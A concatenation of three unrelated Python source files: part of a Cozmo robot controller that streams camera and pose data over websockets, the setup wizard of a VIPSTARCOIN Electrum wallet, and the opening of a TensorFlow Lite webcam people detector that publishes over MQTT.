# print('running code:', code)
exec(code, locals(), locals())
def on_camera_image(self, cli, image):
# print('self.on_image', image)
self._latest_image = image
def feedRobotDataInThread(self):
print('Starting data feed')
while True:
if self._robot is None:
# print('No robot')
time.sleep(0.1)
continue
# Feed camera
image = self._latest_image
if image is None:
# print('No image')
time.sleep(0.1)
continue
fobj = io.BytesIO()
image.save(fobj, format="jpeg")
fobj.seek(0)
binaryImage = fobj.read()
if binaryImage is None:
continue
# print("sending image")
self._camClient.send(binaryImage, binary=True)
# Feed robot data
def getData(pose):
# Don't fail if one of the cubes has flat battery.
if not pose:
return {
'x': 0,
'y': 0,
'z': 0,
'rot': (0, 0, 0, 0)
}
pos = pose.position - self._origin.position
rot = quaternion.div(pose.rotation.q0_q1_q2_q3, self._origin.rotation.q0_q1_q2_q3)
return {
'x': pos.x,
'y': pos.y,
'z': pos.z,
'rot': rot
}
def getCubeData(num):
cube = self._robot.world.light_cubes.get(num)
data = getData(cube.pose)
data['seen'] = self.getCubeSeen(num)
data['visible'] = self.getCubeIsVisible(num)
return data
data = {
'cozmo': getData(self._robot.pose),
'cubes': [
getCubeData(1),
getCubeData(2),
getCubeData(3)
]
}
self._wsClient.send(json.dumps(data))
# Sleep a while
time.sleep(0.1)
def resetCubes(self):
'''
Resets position of all cubes to make them "not yet seen".
'''
for key in self._robot.world.light_cubes:
cube = self._robot.world.light_cubes.get(key)
# Don't fail if one of the cubes has flat battery.
if cube.pose:
cube.pose._position = Vector3(0, 0, 0)
def resetCustomObjects(self):
# self._robot.world.delete_all_custom_objects()
return True
def playAnimation(self, animation):
self._robot.play_anim(animations[animation])
self._robot.wait_for(pycozmo.event.EvtAnimationCompleted)
def playEmotion(self, emotion):
f = emotions[emotion]()
f.render()
def lift(self, height):
'''
height - float, 0=bottom to 1=top
'''
self._robot.set_lift_height(LiftPosition(ratio=height).height.mm)
def head(self, angle):
'''
angle - degrees (low=-25, high=44.5)
'''
self._robot.set_head_angle(Angle(degrees=angle).radians)
def getCubeNumber(self, cube):
return self.cubes_to_numbers.get(cube.object_id)
def getCubeSeen(self, cube_num):
'''
Returns whether cube has been seen since program start.
'''
cube = self._robot.world.light_cubes[cube_num]
if cube.pose:
pos = cube.pose.position.x_y_z
return not (pos == (0.0, 0.0, 0.0))
else:
return False
def getCubeIsVisible(self, cube_num):
'''
Returns whether cube is visible (in the view).
'''
cube = self._robot.world.light_cubes[cube_num]
if cube:
return cube.is_visible
else:
return False
def getDistanceToCube(self, cube_num):
'''
Returns the distance to the cube if it has been seen since the program start, or 100000 otherwise.
'''
if not self.getCubeSeen(cube_num):
return 100000
cube = self._robot.world.light_cubes[cube_num]
pos = self._robot.pose.position - cube.pose.position
dist = math.sqrt(pos.x * pos.x + pos.y * pos.y + pos.z * pos.z) / 10.0
return dist
def getDistanceBetweenCubes(self, cube1_num, cube2_num):
'''
Returns the distance between two cubes if both have been seen since the program start, or 100000 otherwise.
'''
if not self.getCubeSeen(cube1_num) or not self.getCubeSeen(cube2_num):
return 100000
cube1 = self._robot.world.light_cubes[cube1_num]
cube2 = self._robot.world.light_cubes[cube2_num]
pos = cube1.pose.position - cube2.pose.position
dist = math.sqrt(pos.x * pos.x + pos.y * pos.y + pos.z * pos.z) / 10.0
return dist
def pickupCube(self, cube_num):
'''
Now this is tricky because the action is quite unreliable.
'''
# Ignore if cube has not been observed yet.
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring pickupCube() as the cube has not been observed yet")
return False
return False
# cube = self._robot.world.light_cubes[cube_num]
# # res = self._robot.pickup_object(cube).wait_for_completed()
# # print('pickupCube res:', res)
# res = None
# while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_reason[1] in ["repeat", "aborted"]):
# # while res == None or res.state == cozmo.action.ACTION_FAILED:
# res = self._robot.pickup_object(cube).wait_for_completed()
# print('pickupCube res:', res)
# return res.state == cozmo.action.ACTION_SUCCEEDED
def placeCubeOnGround(self, cube_num):
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring placeCubeOnGround() as the cube has not been observed yet")
return False
return False
# cube = self._robot.world.light_cubes[cube_num]
# res = self._robot.place_object_on_ground_here(cube).wait_for_completed()
# return res.state == cozmo.action.ACTION_SUCCEEDED
def placeCubeOnCube(self, other_cube_num):
'''
Another unreliable action.
'''
if not self.getCubeSeen(other_cube_num):
print("[Bot] Ignoring placeCubeOnCube() as the cube has not been observed yet")
return False
return False
# print("[Bot] Executing placeCubeOnCube()")
# cube = self._robot.world.light_cubes[other_cube_num]
# # while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_code in ["repeat", "aborted"]):
# # res = self._robot.go_to_object(cube, distance_mm(100)).wait_for_completed()
# # print(res)
# # if res.state == cozmo.action.ACTION_SUCCEEDED:
# # res = None
# res = None
# while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_code in ["repeat", "aborted"]):
# res = self._robot.place_on_object(cube).wait_for_completed()
# print(res)
# print("[Bot] placeCubeOnCube() finished")
# return res.state == cozmo.action.ACTION_SUCCEEDED
def gotoOrigin(self):
res = self._robot.go_to_pose(self._origin)
return True
def say(self, text):
print("[Bot] Executing Say: " + text)
# res = self._robot.say_text(text).wait_for_completed()
# print("[Bot] Say finished")
# return res.state == cozmo.action.ACTION_SUCCEEDED
return False
def enableFreeWill(self, enable):
print("[Bot] Executing enableFreeWill(" + str(enable) + ")")
if enable:
self._robot.start_freeplay_behaviors()
else:
self._robot.stop_freeplay_behaviors()
def stop(self):
print("[Bot] Executing stop")
self._robot.stop_all_motors()
def delay(self, seconds):
'''
seconds - can be float for fractions of a second
'''
# print("[Bot] Executing delay " + str(seconds))
time.sleep(seconds)
def turn(self, angle):
print("[Bot] Executing turn " + str(angle))
res = self._robot.turn_in_place(Angle.degrees(angle)).wait_for_completed()
print("[Bot] turn finished")
return res.state == cozmo.action.ACTION_SUCCEEDED
def turnTowardCube(self, cube_num):
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring turnTowardCube() as the cube has not been observed yet")
return False
print("[Bot] Executing turn toward cube")
cube = self._robot.world.light_cubes[cube_num]
pos = self._robot.pose.position - cube.pose.position
angle = Angle.radians(math.atan2(pos.y, pos.x) - math.pi) - self._robot.pose.rotation.angle_z
res = self._robot.turn_in_place(angle).wait_for_completed()
print("[Bot] turn finished")
return res.state == cozmo.action.ACTION_SUCCEEDED
def driveDistanceWithSpeed(self, distance, speed):
print("[Bot] Executing driveDistanceSpeed(" + str(distance) + ", " + str(speed) + ")")
res = self._robot.drive_straight(Distance.mm(distance * 10), Speed.mmps(speed * 10))
print("[Bot] driveDistanceSpeed finished")
return True
def driveWheelsWithSpeed(self, lSpeed, rSpeed):
print("[Bot] Executing driveWheelsWithSpeed(" + str(lSpeed) + ", " + str(rSpeed) + ")")
self._robot.drive_wheels(lSpeed * 10, rSpeed * 10)
def driveTo(self, x, y):
print("[Bot] Executing driveTo(" + str(x) + ", " + str(y) + ")")
pose = Pose(x * 10, y * 10, 0, angle_z=self._robot.pose.rotation.angle_z)
res = self._robot.go_to_pose(self._origin.define_pose_relative_this(pose))
print("[Bot] driveTo finished")
return True
def waitForTap(self):
print("[Bot] Executing waitForTap()")
return self._robot.wait_for('ObjectTapped', timeout=None).obj
def addStaticObject(self, model, x1, y1, x2, y2, depth, height):
print("[Bot] Executing addStaticObject({},{},{},{},{},{})".format(x1, y1, x2, y2, depth, height))
data = {
'addStaticObject': {
'model': model,
'x1': x1,
'y1': y1,
'x2': x2,
'y2': y2,
'depth': depth,
'height': height
}
}
self._wsClient.send(json.dumps(data))
X1 = x1 * 10
Y1 = y1 * 10
X2 = x2 * 10
Y2 = y2 * 10
HEIGHT = height * 10
DEPTH = depth * 10
WIDTH = math.sqrt(math.pow(X1 - X2, 2) + math.pow(Y1 - Y2, 2))
centerX = (X1 + X2) / 2.0
centerY = (Y1 + Y2) / 2.0
centerZ = HEIGHT / 2.0
angle = math.atan2(Y1 - Y2, X1 - X2)
pose = Pose(centerX, centerY, centerZ, angle_z=Angle.radians(angle))
self._robot.world.create_custom_fixed_object(self._origin.define_pose_relative_this(pose), WIDTH, DEPTH, HEIGHT)
def setCubeModel(self, model, num):
data = {
'setCubeModel': {
'model': model,
'cubeNum': num
}
}
self._wsClient.send(json.dumps(data))
def highlight(self, block):
data = {
'highlight': block
}
self._wsClient.send(json.dumps(data))
|
installwizard.py
|
import sys
import threading
import os
import traceback
from typing import Tuple, List
from PyQt5.QtCore import *
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from electrum.plugin import run_hook
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n' \
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n' \
+ _(
"Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> QDckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> MNhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> qc1q3fjfk...')
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('VIPSTARCOIN Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, self.temp_storage if self.temp_storage.file_exists() else None
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename)).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
title = _('Enter Seed')
options = []
if 'mobile' == self.wallet_type:
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n'),
_('This is compatible with vipstarcoin mobile wallet. \n')])
else:
if self.opt_ext:
options.append('ext')
# if self.opt_bip39:
# options.append('bip39')
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n')])
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
line.repaint()
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(5)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
# message = _("Electrum communicates with remote servers to get "
# "information about your transactions and addresses. The "
# "servers all fulfill the same purpose only differing in "
# "hardware. In most cases you simply want to let Electrum "
# "pick one at random. However if you prefer feel free to "
# "select a server manually.")
# choices = [_("Auto connect"), _("Select server manually")]
# title = _("How do you want to connect to a server? ")
# clayout = ChoicesLayout(message, choices)
# self.back_button.setText(_('Cancel'))
# self.exec_layout(clayout.layout(), title)
# r = clayout.selected_index()
# if r == 1:
# nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
# if self.exec_layout(nlayout.layout()):
# nlayout.accept()
# else:
# network.auto_connect = True
# self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
people_detector.py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from utils.data_tracker import *
from utils.mqtt_client import *
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--record', help='Use a VideoWriter to record and save the output',
action='store_true') ### ADD RECORD ARGUMENT - JACOB HAGAN
parser.add_argument('--showdisplay', help='Displays output with cv2',
action='store_true') ### ADD DISPLAY ARGUMENT - JACOB HAGAN
parser.add_argument('--broker-ip', help='IP Address of the MQTT Broker. If no IP is specified, MQTT will not be used.',
default=None) ###ADDED BY COREY CLINE
parser.add_argument('--client_name', help='Name of the MQTT Client Session. Default session is TX1.',
default='TX1') ###ADDED BY COREY CLINE
parser.add_argument('--topic', help='MQTT topic to publish data to. Default topic is test/occupancy.',
default='test/occupancy')
parser.add_argument('--publish-interval', help='Interval in seconds to publish to MQTT topic. Default interval is 10s.',
default=10) ###ADDED BY COREY CLINE
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
